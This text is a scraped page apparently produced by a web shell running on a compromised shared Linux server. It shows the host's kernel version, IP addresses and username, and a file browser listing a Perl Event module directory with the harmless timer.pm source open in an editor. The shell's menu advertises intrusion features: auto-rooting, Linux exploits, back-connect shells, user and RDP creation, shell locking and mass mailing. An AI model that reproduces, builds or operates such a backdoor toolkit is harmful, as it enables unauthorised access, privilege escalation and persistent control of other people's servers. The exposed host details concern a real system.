Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
x86_64-linux-gnu /
perl5 /
5.34 /
Event /
[ HOME SHELL ]
Name
Size
Permission
Action
EventAPI.h
6.3
KB
-rw-r--r--
MakeMaker.pm
3.3
KB
-rw-r--r--
Watcher.pm
2.5
KB
-rw-r--r--
generic.pm
451
B
-rw-r--r--
generic.pod
2.36
KB
-rw-r--r--
group.pm
523
B
-rw-r--r--
idle.pm
569
B
-rw-r--r--
io.pm
393
B
-rw-r--r--
signal.pm
375
B
-rw-r--r--
timer.pm
1.03
KB
-rw-r--r--
type.pm
304
B
-rw-r--r--
typemap
363
B
-rw-r--r--
var.pm
309
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : timer.pm
use strict; package Event::timer; use Carp; use base 'Event::Watcher'; use vars qw(@ATTRIBUTE); @ATTRIBUTE = qw(at hard interval); 'Event::Watcher'->register; sub new { # lock %Event::; my $class = shift; my %arg = @_; my $o = allocate($class, delete $arg{attach_to} || {}); # deprecated for (qw(at after interval repeat)) { if (exists $arg{"e_$_"}) { carp "'e_$_' is renamed to '$_'"; $arg{$_} = delete $arg{"e_$_"}; } } my $has_at = exists $arg{at}; my $has_after = exists $arg{after}; croak "'after' and 'at' are mutually exclusive" if $has_at && $has_after; if ($has_after) { my $after = delete $arg{after}; $o->at(Event::time() + $after); $has_at=1; $o->interval($after) if !exists $arg{interval}; } elsif ($has_at) { $o->at(delete $arg{at}); } if (exists $arg{interval}) { my $i = delete $arg{interval}; $o->at(Event::time() + (ref $i? $$i : $i)) unless $has_at; $o->interval($i); $o->repeat(1) unless exists $arg{repeat}; } $o->init(\%arg); $o; } 1;
Close